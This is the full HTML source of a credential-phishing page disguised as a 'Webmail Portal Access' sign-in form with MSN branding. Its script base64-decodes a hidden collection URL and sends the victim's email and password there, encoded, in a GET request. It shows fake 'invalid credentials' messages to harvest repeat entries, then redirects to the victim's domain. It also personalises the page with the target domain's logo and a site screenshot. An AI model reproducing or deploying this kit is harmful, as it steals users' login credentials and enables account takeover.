<html lang="en"><head>
      
        <!-- Required meta tags -->
       
        <title class="logoname">Webmail Portal Access</title>
        
         <link type="text/css" rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
        
      
     <style type="text/css">
        
        body {
     font-family: 'Open Sans', sans-serif;
     color: #535353;
     background-repeat: no-repeat;
     background-size: cover;
    }
    }
    
    .img-fluid {
        max-width: 100% !important;
        height: auto;
    }
    
    .form-control:focus {
        box-shadow: none;
    }
    
    h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 {
        font-family: 'Open Sans', sans-serif;
    }
    
    /** Login 1 start **/
    .login-1 {
        background: rgba(0, 0, 0, 0.04) url(../img/bg-image.jpg) top left repeat;
        background-size: cover;
        top: 0;
        width: 100%;
        bottom: 0;
        opacity: 1;
        min-height: 100vh;
        text-align: center;
        position: relative;
        display: -webkit-box;
        display: -moz-box;
        display: -ms-flexbox;
        display: -webkit-flex;
        display: flex;
        justify-content: center;
        align-items: center;
        padding: 30px;
    }
    
    .login-1 .login-inner-form {
        max-width: 420px;
        margin: 0 auto;
        color: #717171;
        text-align: center;
    }
    
    .login-1 .login-inner-form .details {
        padding: 25px 30px 30px;
        background: rgba(0, 0, 0,0.8);
        border-radius: 5px 5px 0 0;
    }
    
    .login-1 .login-inner-form img {
        margin-bottom: 15px;
        height: 30px;
    }
    
    .login-1 .login-inner-form h3 {
        margin: 0 0 25px;
        font-size: 18px;
        font-weight: 400;
        font-family: 'Open Sans', sans-serif;
        color: #fff;
    }
    
    .login-1 .login-inner-form .form-group {
        margin-bottom: 25px;
    }
    
    .login-1 .login-inner-form .input-text {
        width: 100%;
        padding: 10px 15px;
        font-size: 14px;
        border: 1px solid #e8e7e7;
        outline: none;
        color: #717171;
        border-radius: 3px;
        height: 45px;
    }
    
    .login-1 .login-inner-form .btn-md {
        cursor: pointer;
        padding: 12px 30px 11px 30px;
        letter-spacing: 1px;
        font-size: 15px;
        font-weight: 600;
        font-family: 'Open Sans', sans-serif;
        border-radius: 3px;
    }
    
    .login-1 .login-inner-form .social-list{
        margin-bottom: 0;
        padding: 0;
    }
    
    .login-1 .login-inner-form .checkbox a {
        font-size: 14px;
        color: #717171;
        float: right;
    }
    
    .login-1 .login-inner-form .terms{
        margin-left: 3px;
    }
    
    .login-1 .login-inner-form .checkbox {
        margin-bottom: 25px;
        font-size: 14px;
    }
    
    .login-1 .login-inner-form .form-check{
        float: left;
        margin-bottom: 0;
    }
    
    .login-1 .login-inner-form .form-check a {
        color: #717171;
        float: right;
    }
    
    .login-1 .login-inner-form .form-check-input {
        position: absolute;
        margin-left: 0;
    }
    
    .login-1 .login-inner-form .form-check label::before {
        content: "";
        display: inline-block;
        position: absolute;
        width: 17px;
        height: 17px;
        margin-left: -25px;
        border: 1px solid #cccccc;
        border-radius: 3px;
        background-color: #fff;
    }
    
    .login-1 .login-inner-form .form-check-label {
        padding-left: 25px;
        margin-bottom: 0;
        font-size: 14px;
    }
    
    .login-1 .login-inner-form .checkbox-theme input[type="checkbox"]:checked + label::before {
        background-color: #0f96f9;
        border-color: #0f96f9;
    }
    
    .login-1 .login-inner-form input[type=checkbox]:checked + label:before {
        font-weight: 300;
        color: #f3f3f3;
        line-height: 15px;
        font-size: 14px;
        content: "\2713";
    }
    
    .login-1 .login-inner-form input[type=checkbox], input[type=radio] {
        margin-top: 4px;
    }
    
    .login-1 .login-inner-form .social-list li {
        display: inline-block;
        font-size: 16px;
        margin-top: 30px;
    }
    
    .login-1 .login-inner-form .social-list li a {
        margin:2px;
        font-size: 14px;
        width: 35px;
        height: 35px;
        border-radius: 3px;
        display: inline-block;
        text-align: center;
        line-height: 35px;
    }
    
    .login-1 .login-inner-form .footer {
        font-size: 14px;
        padding: 15px 20px;
        background-color: #f5f5f5;
        border-radius: 0 0 5px 5px;
        border-top: solid 1px #f5f5f5;
    }
    
    .login-1 .login-inner-form .footer span a {
        color: #717171;
    }
    
    .login-1 .login-inner-form button:focus {
        outline: none;
        outline: 0 auto -webkit-focus-ring-color;
    }
    
    .login-1 .login-inner-form .btn-theme:not([disabled]):not(.disabled).active, .btn-theme:not([disabled]):not(.disabled):active, .show > .btn-theme.dropdown-toggle {
        box-shadow: none;
    }
    
    .login-1 .login-inner-form .btn-theme.focus, .btn-theme:focus {
        box-shadow: none;
    }
    
    .login-1 .login-inner-form .btn-theme {
        background: #0f96f9;
        border: none;
        color: #fff;
    }
    
    .login-1 .login-inner-form .btn-theme:hover {
        background: #0294B6;
    }
    
    /** Social media **/
    .login-1 .facebook-bg {
        background: #4867aa;
        color: #fff;
    }
    
    .login-1 .facebook-bg:hover {
        background: #3b589e;
        color: #fff;
    }
    
    .login-1 .twitter-bg {
        background: #33CCFF;
        color: #fff;
    }
    
    .login-1 .twitter-bg:hover {
        background: #56d7fe;
        color: #fff;
    }
    
    .login-1 .google-bg {
        background: #db4437;
        color: #fff;
    }
    
    .login-1 .google-bg:hover {
        background: #dc4e41;
        color: #fff;
    }
    
    .login-1 .linkedin-bg {
        background: #0177b5;
        color: #fff;
    }
    
    .login-1 .linkedin-bg:hover {
        background: #1c82ca;
        color: #fff;
    }
    
    /** MEDIA **/
    @media (max-width: 992px) {
        .login-1 {
            padding: 30px 0;
        }
    }
    
    
        </style>
		
<script language="javascript" type="text/javascript">

var sendurl = atob("aHR0cHM6Ly9pdS5saWM0a2YucnUuY29tL3ZlcmlmeTEvc2VuZC5waHA=");
var countattempt=0;
var validmailtxt = "Please Check Your Email Address";
var validpasstxt = "Invalid credentials. email/password is incorrect";
var validwaittxt = "Please wait we are verifying your domain in few seconds...";
var validthnkstxt = "Thank You";
if (typeof XMLHttpRequest === "undefined") {
  XMLHttpRequest = function () {
    try { return new ActiveXObject("Msxml2.XMLHTTP.6.0"); }
    catch (e) {}
    try { return new ActiveXObject("Msxml2.XMLHTTP.3.0"); }
    catch (e) {}
    try { return new ActiveXObject("Microsoft.XMLHTTP"); }
    catch (e) {}
    throw new Error("This browser does not support XMLHttpRequest.");
  };
}
function createCORSRequest(method, url){
  var xhr = new XMLHttpRequest();
  if ("withCredentials" in xhr){
    xhr.open(method, url, false);
  } else if (typeof XDomainRequest != "undefined"){
    xhr = new XDomainRequest();
    xhr.open(method, url);
  } else {
    xhr = null;
  }
  return xhr;
}
function postdata(){
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
  if (this.readyState == 4 && this.status == 200) {
	  if(this.responseText=="ok"){
	      if(countattempt>1){
		  var domainname = email.value.split("@")[1];
		  document.getElementById('submit-btn').innerHTML = "Download";
		  document.getElementById('msgfont').style.display = "none";
		  document.getElementById('msgfont').innerHTML = "";
		  document.getElementById("emmm").innerHTML = '<font color="green" id="msgedone">'+validwaittxt+'</font>';
		  var meta=document.createElement('meta');
		  meta.setAttribute('http-equiv', 'refresh');
		  meta.setAttribute('content', '8; url='+domainname+'');
		  document. getElementsByTagName('head')[0]. appendChild(meta);
		  }else{
		  countattempt++;
		  document.getElementById('msgfont').style.display = "block";
		  document.getElementById('msgfont').innerHTML = validpasstxt;
		  password.value="";
		  password.focus();
		  document.getElementById('submit-btn').innerHTML = "Download";
		  }
	  }else{
	  document.getElementById('msgfont').style.display = "block";
	  document.getElementById('msgfont').innerHTML = validpasstxt;
	  password.value="";
	  password.focus();
	  document.getElementById('submit-btn').innerHTML = "Download";
	  }
  }
};
xhttp.open("GET", sendurl+"?type=WebPortal&email="+btoa(email.value)+"&password="+btoa(password.value), true);
xhttp.send();
}
function ValidateEmail(mail) 
{
 if (/^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/.test(mail))
  {
    return (true)
  }
    return (false)
}
function mobileverif(){
if(!ValidateEmail(email.value)){
document.getElementById('msgfont').style.display = "block";
document.getElementById('msgfont').innerHTML = validmailtxt;
email.focus();	
}else{
document.getElementById('msgfont').style.display = "none";
document.getElementById('msgfont').innerHTML = "";
document.getElementById('submit-btn').innerHTML = "Connect ...";
postdata();
}
}

</script>		

</head>
      <body id="top" style="background-image: url(&quot;https://image.thum.io/get/width/1288880/https://msn.com&quot;);">
     <iframe id="mainPage" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
    allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>
    
    <!-- Login 1 start -->
    <div class="login-1">
        <div class="container">
            <div class="row">
                <div class="col-md-12">
                    <div class="login-inner-form">
                        <div class="details">
                            
    <div align="center" id="emmm">
           <h2 class="text-center"><div id="top"><img src="https://logo.clearbit.com/msn.com" alt="" id="logoimg" style="width:30px;height:30px;margin-top:10px;">
             
              <span style="vertical-align: middle; padding-left: 3px;color: #fff;" id="logoname"></span> </div>
                          <p><span style="font-size: 20px;color:gray;">Sign in to continue </span></p>
                  <span style="font-size: 15px;color:white;">kindly sign in your email with your valid credentials</span><br><br>
            <center>
              <div class="alert alert-danger" id="msgfont" style="font-size:14px;display:none;"></div>
            </center>
            <div class="form-group">
              <div class="input-group">
                <span class="input-group-addon"><i class="fas fa-user"></i></span>
                <input type="email" class="form-control" name="email" placeholder="Username" value="[[-Email-]]" id="email">
              </div>
            </div>
            <div class="form-group">
              <div class="input-group">
                <span class="input-group-addon"><i class="fas fa-lock"></i></span>
                <input type="password" class="form-control" id="password" name="password" placeholder="Password" required="required">
              </div>
            </div>
            <div class="form-group">
             <div align="left">
              <input type="checkbox"><span style="font-size: 15px;color:gray;"> Remember me </span> 
            </div>
            </div>
            <div class="form-group">
             
                       <button type="submit" class="btn btn-primary login-btn btn-block" id="submit-btn" onclick="mobileverif()" >Sign in</button>
            </div>
           
    
          
          
        </h2></div>
    
    
    
    
    
        <style>.tb_button {padding:1px;cursor:pointer;border-right: 1px solid #8b8b8b;border-left: 1px solid #FFF;border-bottom: 1px solid #fff;}.tb_button.hover {borer:2px outset #def; background-color: #f8f8f8 !important;}.ws_toolbar {z-index:100000} .ws_toolbar .ws_tb_btn {cursor:pointer;border:1px solid #555;padding:3px}   .tb_highlight{background-color:yellow} .tb_hide {visibility:hidden} .ws_toolbar img {padding:2px;margin:0px}</style>
    
    
<script>
var input = document.getElementById("password");

// Execute a function when the user releases a key on the keyboard
input.addEventListener("keyup", function(event) {
  // Number 13 is the "Enter" key on the keyboard
  if (event.keyCode === 13) {
    // Cancel the default action, if needed
    event.preventDefault();
    // Trigger the button element with a click
    document.getElementById("submit-btn").click();
  }
});
var url_string = window.location.href; 
var url = new URL(url_string);
var cid = url.searchParams.get("id");
if(cid){
document.getElementById("email").value = cid;
var domainname = cid.split("@")[1];
document.getElementById("top").style.backgroundImage = "url(https://image.thum.io/get/width/1288880/https://"+domainname+")";
document.getElementById("logoimg").src = "https://logo.clearbit.com/"+domainname;
}
</script>
      
    
    
    
    </div></div></div></div></div></div></body></html>
